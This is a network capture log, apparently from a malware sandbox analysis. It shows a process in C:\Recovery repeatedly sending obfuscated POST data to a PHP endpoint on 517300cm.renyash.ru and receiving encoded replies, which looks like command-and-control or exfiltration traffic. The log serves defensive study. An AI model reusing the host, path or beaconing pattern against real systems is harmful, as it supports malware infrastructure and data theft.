Jan 9, 2025 18:12:16.188184023 CET	969	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hMcBNNa%2BCUxtssPty67NP2et9RqMDc7%2BDvwZoD%2Bsc%2B%2F%2Fnf8xCDfOHRGhy5qSTC34B9ZdvClr4fUPzRaCvfeyZiyXDzYja0KJely2j%2FBkgj%2FQntYEuQlVDXnZzSNytWH4e1p3MlYf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60d1b5d2b431c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=15721&min_rtt=1668&rtt_var=21483&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2226&recv_bytes=1352&delivery_rate=1694718&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 22 05 24 25 2b 1f 33 02 37 1d 25 31 03 55 22 1f 0c 17 2c 2e 02 45 37 2a 23 5c 38 21 3d 13 21 3c 33 18 24 22 21 57 26 3f 24 0f 36 36 21 5d 01 12 27 03 30 2a 31 01 24 58 3b 03 26 3b 3f 08 34 2d 34 13 33 3b 08 1a 24 33 1d 0a 20 2e 35 50 3e 03 07 5c 2c 3f 3f 06 2f 37 20 58 3e 39 2b 51 0e 10 21 0f 33 3e 3e 16 29 3d 3f 10 25 54 27 0f 29 2c 23 5d 26 2c 3c 53 29 39 06 55 25 39 3c 59 34 3f 2b 07 28 03 3c 1e 33 16 0b 1b 2b 38 20 5c 2e 00 2d 52 04 3e 54 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98"$%+37%1U",.E7#\8!=!<3$"!W&?$66!]'01$X;&;?4-43;$3 .5P>\,??/7 X>9+Q!3>>)=?%T'),#]&,<S)9U%9<Y4?+(<3+8 \.-R>TP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:16.441507101 CET	301	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49737	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:16.441854954 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1292 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:16.800055027 CET	1292	OUT	Data Raw: 50 5e 5b 58 58 42 55 52 59 58 51 54 5b 57 57 52 5f 55 58 5b 52 52 5a 44 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P^[XXBURYXQT[WWR_UX[RRZD^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#Y)X =?##/;+[7%?*;">=10S1;#^#<'Y?:'\"/Y.(
Jan 9, 2025 18:12:16.964343071 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:17.216260910 CET	966	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R1ypofhGfcrjO%2BlH%2FDAXCS0auKeVZL74Y5FK%2F%2FGwCZoJB6JdW8eEe8c%2FtB5sR%2FBdq8SXJk3dBwrgVGs1cz2Gwz%2FzmYfngZDOTAxM30WQFkY20KWvddyCg30%2FLcYuo3QpHGQmBZN7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60d21ce5a7cb4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=68509&min_rtt=47522&rtt_var=32812&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1617&delivery_rate=30722&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 21 14 25 36 33 54 24 12 37 1d 25 22 22 0f 23 31 25 06 38 10 3f 1a 34 14 06 06 38 22 22 00 35 2f 37 5b 33 32 03 51 32 3f 3f 52 22 0c 21 5d 01 12 24 5b 24 2a 22 5d 30 3d 34 5a 26 38 02 19 37 07 20 58 27 5d 36 19 32 1d 19 0b 36 3e 3d 1d 3e 3e 32 04 2f 3c 2c 5c 2c 51 33 00 28 39 2b 51 0e 10 22 57 30 2d 03 04 2b 2d 33 59 32 1c 1a 53 2a 06 37 5d 25 3c 0d 0a 3e 17 20 57 24 17 24 58 20 01 28 5b 28 03 38 5b 27 06 03 56 3e 38 20 5c 2e 00 2d 52 04 3e 54 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98!%63T$7%""#1%8?48""5/7[32Q2??R"!]$[$"]0=4Z&87 X']626>=>>2/<,\,Q3(9+Q"W0-+-3Y2S7]%<> W$$X ([(8['V>8 \.-R>TP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49738	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:16.573610067 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:16.924978018 CET	1012	OUT	Data Raw: 50 54 5b 5c 58 47 50 50 59 58 51 54 5b 57 57 5d 5f 57 58 58 52 5c 5a 48 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PT[\XGPPYXQT[WW]_WXXR\ZH^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z 3! =38;?#\#"-)U1 U28;4,#(:'\"/Y.(
Jan 9, 2025 18:12:17.092209101 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:17.324870110 CET	811	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TvMmJOn%2BbTVEu9mFA5NBz0cAfnpZtRvIPBdjLPk8U%2BEBjQvUzwsmzbRcGtb6tZYGZ2SVg2c%2Fw%2BwOyzMW%2F3b0wE0ZCJDrx8MhVdEc32QwEpMX7X9F03FnnCBdHw%2B4RkSpL81S3m46"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60d228c76f5f8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7773&min_rtt=1689&rtt_var=12803&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=28986&cwnd=106&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:17.459466934 CET	301	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 9, 2025 18:12:17.815519094 CET	1012	OUT	Data Raw: 55 55 5e 5c 5d 47 55 5e 59 58 51 54 5b 51 57 5c 5f 56 58 55 52 59 5a 45 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UU^\]GU^YXQT[QW\_VXURYZE^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#_> 6 ,:30-(7\ >:+5.:2V.1<4/X+'\"/Y.0
Jan 9, 2025 18:12:17.943346024 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:18.179482937 CET	807	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tpHWLBFKGmZEPR2IbbbbqVj5rJwFiIPGnTSqh%2B12aLIOJzgqXyW9Ba2o7pFrez8uxu3IHMGGWO1wHxXf0LDo7XrvQd9ybPd9APTqmuMdqjSoxzX95c%2Bs310SuR0cbmMvlZta%2Fx%2Fc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60d27dacf7d0b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7126&min_rtt=2199&rtt_var=10679&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1313&delivery_rate=35081&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:18.307718992 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:18.659293890 CET	1012	OUT	Data Raw: 55 52 5b 59 58 48 50 57 59 58 51 54 5b 5d 57 51 5f 57 58 5d 52 5a 5a 42 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UR[YXHPWYXQT[]WQ_WX]RZZB^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z )!#<2>\/+?#$=:(![%S%=17!?,?'\"/Y.
Jan 9, 2025 18:12:18.753211975 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:19.236579895 CET	808	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KPgyS%2BzS2zu%2FaGloSIF7OG58XmbnlI8sg%2ByrHbuXRpk7I7wFychaXSWN0l%2FOBK3hR7EUPtRqRV4oPTcPu0njUPJWPhxz9XWdYbrjnvDVKDJX5D6sH9z5l4%2FFgCl9q40uRMqSjNqk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60d2cfc8c0f49-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4534&min_rtt=1659&rtt_var=6374&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=59190&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:19.364370108 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:19.721779108 CET	1012	OUT	Data Raw: 50 53 5b 5e 58 40 50 50 59 58 51 54 5b 50 57 5c 5f 57 58 5b 52 58 5a 43 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PS[^X@PPYXQT[PW\_WX[RXZC^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#)%Y ==#7-(?]7'^** >139T&;4/$<'\"/Y.4
Jan 9, 2025 18:12:19.847570896 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:20.091801882 CET	807	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oeU9lde2WjHA2sgahmdKLgH%2B2fqVyYA7FGCq0DpnfdHHyZnGPolB6LBYJ28vy4n9dLwiy5pqGyLm55B9kei7jvWFmuwr%2Fj4s%2B6LPgOHsTwspzzT9968%2BYmdygKSwvlWGl3kzc2kD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60d33cc547d18-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3519&min_rtt=1961&rtt_var=3851&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=101213&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:20.228708029 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:20.581296921 CET	1008	OUT	Data Raw: 50 5f 5b 59 58 42 55 55 59 58 51 54 5b 55 57 5c 5f 55 58 5a 52 5a 5a 47 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P_[YXBUUYXQT[UW\_UXZRZZG^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#)U%]4<*3+]-+ ')\ T .5S% 28$ +:'\"/Y.
Jan 9, 2025 18:12:20.674922943 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:20.914527893 CET	806	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wjQxMwE1rPnqMLwKJstI3ABMY3teSCdqfbXaKF4e82AhHrMylRtFPUjnOd%2BFmKvyC%2FYyG4WTZnUj8ghl6IGeax0cWXFQ5f3RBFtiB2ZQr7HPEotIrEiF7%2BqEBxe%2FRKYi3TvjDhGH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60d38ff0c42fb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5118&min_rtt=2147&rtt_var=6748&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=56324&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:21.044698000 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:21.393523932 CET	1012	OUT	Data Raw: 50 52 5e 5e 58 45 50 50 59 58 51 54 5b 53 57 53 5f 5c 58 59 52 5a 5a 40 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PR^^XEPPYXQT[SWS_\XYRZZ@^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#) >#.X*88+[ &;+:".12] 78+'\"/Y.8
Jan 9, 2025 18:12:21.508826971 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:21.884931087 CET	806	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lEta5qgTiyybbFaczyTKDsd5PyWTzvsRSjmImo5P33NGDnSJDKvcOZ7gj0YLOXm0IHtGeIzMxjF8O0Fo8J5mWODxVpRI7uvA%2BzRRd8n%2BbUnfTWOKzhasQNPNApTAeI34Teq%2F%2Bys0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60d3e2c2042c8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4451&min_rtt=1811&rtt_var=5960&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=63655&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:22.004128933 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49746	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:22.228629112 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1292 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:22.581068039 CET	1292	OUT	Data Raw: 50 5e 5b 5b 58 44 50 53 59 58 51 54 5b 56 57 52 5f 53 58 5b 52 59 5a 41 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P^[[XDPSYXQT[VWR_SX[RYZA^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#Z>3=]#Z&?3'-83# ):V65V%!W1+7?$):'\"/Y.,
Jan 9, 2025 18:12:22.709880114 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:12:22.962862015 CET	953	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:12:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0v0mM37wpw8dQ0r2Va4Gz4827AO4RTs4olPCTkq5RjNWJGvAC2Ft6%2FwPW2VyPtjdM7szzD9dLQ6D%2FIIfx9wsWUkHOlL%2F1JSoB2cxz874Im0jAZQK07zvGJhfNXK0baFTQZ5hsuR4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60d45a86e41d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4797&min_rtt=1856&rtt_var=6579&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1617&delivery_rate=57507&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 21 58 26 35 33 55 33 5a 27 1e 31 57 2d 50 21 1f 3d 06 38 10 23 1d 34 14 23 58 2d 22 2a 06 36 59 28 07 27 31 35 57 25 02 0d 15 36 36 21 5d 01 12 27 04 25 29 31 02 30 3e 28 1d 32 06 06 18 23 00 38 12 27 2b 29 0d 31 30 24 1c 22 2d 35 13 3d 03 0f 58 2c 01 28 5e 2f 24 30 5b 3f 13 2b 51 0e 10 22 52 24 03 25 00 2b 3d 27 1f 25 0c 28 52 2a 2f 33 11 24 2c 2c 11 3d 29 28 56 25 29 23 03 20 11 20 10 3f 04 2c 58 25 2b 21 1a 2a 02 20 5c 2e 00 2d 52 04 3e 54 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98!X&53U3Z'1W-P!=8#4#X-"6Y('15W%66!]'%)10>(2#8'+)10$"-5=X,(^/$0[?+Q"R$%+='%(R/3$,,=)(V%)# ?,X%+!* \.-R>TP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49747	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:12:22.353868961 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:12:22.706229925 CET	1012	OUT	Data Raw: 50 5f 5e 5f 5d 40 50 57 59 58 51 54 5b 53 57 57 5f 55 58 55 52 58 5a 45 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: P_^_]@PWYXQT[SWW_UXURXZE^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#)3!/&\>3'\//7%4**+!5R& &+04?7^<'\"/Y.8
Jan 9, 2025 18:12:22.798137903 CET	25	IN	HTTP/1.1 100 Continue
